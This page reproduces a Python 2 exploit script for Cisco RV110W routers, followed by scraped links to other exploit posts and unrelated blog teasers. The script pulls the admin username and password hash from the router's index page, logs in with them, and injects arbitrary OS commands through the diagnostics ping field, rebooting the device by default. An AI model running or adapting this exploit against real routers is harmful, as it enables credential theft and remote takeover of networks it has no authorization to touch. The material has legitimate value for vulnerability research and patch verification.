[EXP]Cisco RV110W - Password Disclosure / Command Execution
- #!/usr/bin/env python2
- #####
- ## Cisco RV110W Password Disclosure and OS Command Execute.
- ### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
- # Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
- # Date: 2018-08
- # Exploit Author: RySh
- # Vendor Homepage: https://www.cisco.com/
- # Version: 1.1.0.9
- # Tested on: RV110W 1.1.0.9
- # CVE : CVE-2014-0683, CVE-2015-6396
- import os
- import sys
- import re
- import urllib
- import urllib2
- import getopt
- import json
- import ssl
- ssl._create_default_https_context = ssl._create_unverified_context
- ###
- # Usage: ./{script_name} 192.168.1.1 443 "reboot"
- ###
- if __name__ == "__main__":
- IP = argv[1]
- PORT = argv[2]
- CMD = argv[3]
- # Get session key, Just access index page.
- url = 'https://' + IP + ':' + PORT + '/'
- req = urllib2.Request(url)
- result = urllib2.urlopen(req)
- res = result.read()
- # parse 'admin_pwd'! -- Get credits
- admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
- admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
- print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
- # Get session_id by POST
- req2 = urllib2.Request(url + "login.cgi")
- req2.add_header('Origin', url)
- req2.add_header('Upgrade-Insecure-Requests', 1)
- req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
- req2.add_header('User-Agent',
- 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
- req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
- req2.add_header('Referer', url)
- req2.add_header('Accept-Encoding', 'gzip, deflate')
- req2.add_header('Accept-Language', 'en-US,en;q=0.9')
- req2.add_header('Cookie', 'SessionID=')
- data = {"submit_button": "login",
- "submit_type": "",
- "gui_action": "",
- "wait_time": "",
- "change_action": "",
- "enc": "",
- "user": admin_user,
- "pwd": admin_pwd,
- "sel_lang": "EN"
- }
- r = urllib2.urlopen(req2, urllib.urlencode(data))
- resp = r.read()
- login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
- session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
- # Execute your commands via diagnose command parameter, default command is `reboot`
- req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
- req3.add_header('Origin', url)
- req3.add_header('Upgrade-Insecure-Requests', 1)
- req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
- req3.add_header('User-Agent',
- 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
- req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
- req3.add_header('Referer', url)
- req3.add_header('Accept-Encoding', 'gzip, deflate')
- req3.add_header('Accept-Language', 'en-US,en;q=0.9')
- req3.add_header('Cookie', 'SessionID=')
- data_cmd = {"submit_button": "Diagnostics",
- "change_action": "gozila_cgi",
- "submit_type": "start_ping",
- "gui_action": "",
- "traceroute_ip": "",
- "commit": "",
- "ping_times": "3 |" + CMD + "|",
- "ping_size": "",
- "wait_time": "",
- "ping_ip": "127.0.0.1",
- "lookup_name": ""
- }
- r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
[EXP]Cisco RV110W - Password Disclosure / Command Execution的更多相关文章
- [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...
- PowerShell vs. PsExec for Remote Command Execution
Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...
- struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution
catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...
- Fatal error encountered during command execution
MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...
- MYSQL报Fatal error encountered during command execution.错误的解决方法
{MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...
- My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution
Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...
- JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution
CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...
随机推荐
- [剑指Offer]7-重建二叉树
链接 https://www.nowcoder.com/practice/8a19cbe657394eeaac2f6ea9b0f6fcf6?tpId=13&tqId=11157&tPa ...
- Tomcat9.0.13 Bug引发的java.io.IOException:(打开的文件过多 Too many open files)导致服务假死
问题背景: 笔者所在的项目组最近把生产环境Tomcat迁移到Linux,算是顺利运行了一段时间,最近一个低概率密度的(too many open files)问题导致服务假死并停止响应客户端客户端请求 ...
- Linux-echo、cat命令详解(14)
echo:显示一段文字 比如: echo hello,串口上就显示hello echo hello > /dev/tty1, LCD上便显示hello字段 cat:查看一个文件的内容 比如: c ...
- Ubuntu部署可视化爬虫Portia2.0环境以及入门
http://www.cnblogs.com/kfpa/p/Portia.html http://brucedone.com/archives/986
- Elasticsearch tshark 封包分析 (转)
Elasticsearch tshark 封包分析 使用wireshark能解決許多網路問題,將側錄下來的封包傳至Elasticsearch上方便分析製作及時報表.tshark為wireshark的命 ...
- 20172325 2018-2019-2 《Java程序设计》第六周学习总结
20172325 2018-2019-2 <Java程序设计>第六周学习总结 教材学习内容总结 本周学习第十章--树 1.什么是树 (1)树是一种数据结构,与之前学过的栈.队列和列表这些线 ...
- slf4j 日志组件
slf4j:Simple Logging Facade for Java 官网:https://www.slf4j.org/
- ----关于grid----
HTML部分: <div class="wrapper"> <div class="one">One</div> <d ...
- ibatis (六) dynamic的用法
view plain copy print? dynamic可以去除第一个prepend="and"中的字符(这里为and),从而可以帮助你实现一些很实用的功能.具体情况如下: 1 ...
- Python Day 2
阅读目录: 内容回顾 编程语言介绍 python语言介绍 安装官方cpython解释器 --版本共存 运行python代码 --交互式:实时交互 --脚本式:运行py文件的三步骤 变量 ...